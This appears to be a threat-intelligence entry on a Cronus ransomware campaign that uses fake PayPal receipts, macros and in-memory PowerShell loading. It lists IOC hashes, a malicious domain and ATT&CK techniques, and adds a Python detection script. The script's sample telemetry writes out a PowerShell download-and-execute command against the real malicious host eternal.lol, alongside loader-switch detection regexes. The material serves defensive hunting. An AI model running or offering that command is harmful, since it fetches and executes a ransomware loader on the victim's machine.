Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell

Aug. 7, 2024, 8:37 a.m.

Description

This analysis covers a campaign that uses fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain starts with a malicious Word document carrying an obfuscated VBA macro; when the recipient enables macros, the macro downloads a PowerShell loader from a remote server. The loader uses reflective DLL loading to map and execute the ransomware payload directly in memory, so the final stage is never written to disk and hash- or file-scan-based detection only sees the document and loader stages. The ransomware enumerates and encrypts specific file types, terminates processes, establishes persistence, and manipulates clipboard data. For defenders this means the most reliable detection points are the process lineage (an Office application spawning PowerShell), PowerShell launched with loader-style switches, the network contact to the download server, and the persistence write, rather than the encrypted payload itself.
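The following is an added example, not code from the original page or from the analysis it summarises. It turns the infection chain above into a small hunt over endpoint telemetry: the SHA-256 hashes and domain are copied from the page's Indicators list, while the behavioural rules (Office spawning a script host, PowerShell loader switches, a Run-key write) are generic assumptions derived from the description. The sample events are constructed Sysmon-style records, and the pairing of one indicator hash with a receipt document in the sample is illustrative only; the page does not say which hash belongs to which artifact.

```python
import re
from dataclasses import dataclass

# SHA-256 hashes and the domain copied from the page's Indicators list.
SHA256_IOCS = {
    "dd78c6dc62463aba24cdbea3968cbcc1c7b97a736ef069d99d6512b10c5e91f3",
    "afb95b1b2092020ed98312602c300f51daca14bb3d65503df3c5ca4776027987",
    "9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb",
    "69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3",
    "629587e592130b86418d17d6b8cc52b6f378f39f1b5e8caa4038cfa7120b2a53",
    "42551531be1c5abfdd24a3465788c659a038141de61976787b0862664df95aad",
}
DOMAIN_IOCS = {"eternal.lol"}

# Behavioural rules (assumptions derived from the description, not Cronus-specific).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = POWERSHELL | {"wscript.exe", "cscript.exe", "mshta.exe"}
# Switches a download-and-execute loader typically combines; each pattern is one family.
LOADER_SWITCH_RES = [re.compile(p, re.IGNORECASE) for p in (
    r"-nop(?:rofile)?\b",
    r"-noni(?:nteractive)?\b",
    r"-w(?:indowstyle)?\s+hidden\b",
    r"-e(?:nc|ncodedcommand)?\b",
    r"-e(?:xecutionpolicy|p)\s+bypass\b",
)]
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    technique: str   # ATT&CK ID from the page's list, or "IOC" for an indicator hit
    reason: str
    evidence: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def loader_switch_count(cmdline: str) -> int:
    """Number of distinct loader-style switch families present in a command line."""
    return sum(1 for r in LOADER_SWITCH_RES if r.search(cmdline))


def domain_hit(query: str) -> bool:
    """True if the queried name is an IOC domain or a subdomain of one."""
    q = query.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in DOMAIN_IOCS)


def analyze(events) -> list:
    """Run the IOC and behavioural rules over a list of event dicts."""
    findings = []
    for ev in events:
        img = basename(ev.get("image", ""))
        parent = basename(ev.get("parent", ""))
        if ev.get("sha256", "").lower() in SHA256_IOCS:
            findings.append(Finding("IOC", "known Cronus SHA-256 observed", ev["sha256"]))
        if ev["type"] == "process_create":
            if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
                findings.append(Finding("T1059.005", f"{parent} spawned {img} (macro execution)", ev["cmdline"]))
            if img in POWERSHELL and loader_switch_count(ev["cmdline"]) >= 2:
                findings.append(Finding("T1059.001", "PowerShell launched with loader-style switches", ev["cmdline"]))
        elif ev["type"] == "dns_query" and domain_hit(ev["query"]):
            findings.append(Finding("IOC", f"{img} resolved a Cronus download domain", ev["query"]))
        elif ev["type"] == "registry_set" and RUN_KEY_RE.search(ev["target"]):
            findings.append(Finding("T1547.001", f"{img} wrote a Run key", ev["target"]))
    return findings


# Constructed sample telemetry: a benign process, then the chain from the description.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
WORD = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"type": "process_create", "image": "C:\\Windows\\System32\\notepad.exe",
     "parent": "C:\\Windows\\explorer.exe", "cmdline": "notepad.exe notes.txt"},
    {"type": "file_create", "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
     "target": "C:\\Users\\a\\Downloads\\PayPal_Receipt.doc",   # constructed name
     "sha256": "dd78c6dc62463aba24cdbea3968cbcc1c7b97a736ef069d99d6512b10c5e91f3"},
    {"type": "process_create", "image": PS, "parent": WORD,
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient)"
                ".DownloadString('https://eternal.lol/file/')"},
    {"type": "dns_query", "image": PS, "query": "eternal.lol"},
    {"type": "registry_set", "image": PS,
     "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.technique:10} {f.reason}: {f.evidence}")
```

The hash rule only fires on the document stage in the sample, which is the point: because the payload is reflectively loaded, the remaining findings all come from behaviour (Office to PowerShell lineage, loader switches, the download domain, the Run key), and those rules keep working when the attacker rotates hashes and domains.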

Date

  • Created: Aug. 7, 2024, 8:32 a.m.
  • Published: Aug. 7, 2024, 8:32 a.m.
  • Modified: Aug. 7, 2024, 8:37 a.m.

Indicators

  • dd78c6dc62463aba24cdbea3968cbcc1c7b97a736ef069d99d6512b10c5e91f3 (SHA-256)
  • afb95b1b2092020ed98312602c300f51daca14bb3d65503df3c5ca4776027987 (SHA-256)
  • 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb (SHA-256)
  • 69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3 (SHA-256)
  • 629587e592130b86418d17d6b8cc52b6f378f39f1b5e8caa4038cfa7120b2a53 (SHA-256)
  • 42551531be1c5abfdd24a3465788c659a038141de61976787b0862664df95aad (SHA-256)
  • https://eternal.lol/file/ (URL)
  • eternal.lol (domain)

Attack Patterns

  • Cronus Ransomware
  • Cronus
  • T1491.001 Defacement: Internal Defacement
  • T1565.002 Data Manipulation: Transmitted Data Manipulation
  • T1055.012 Process Injection: Process Hollowing
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1204.002 User Execution: Malicious File
  • T1486 Data Encrypted for Impact
  • T1057 Process Discovery
  • T1566.001 Phishing: Spearphishing Attachment
  • T1083 File and Directory Discovery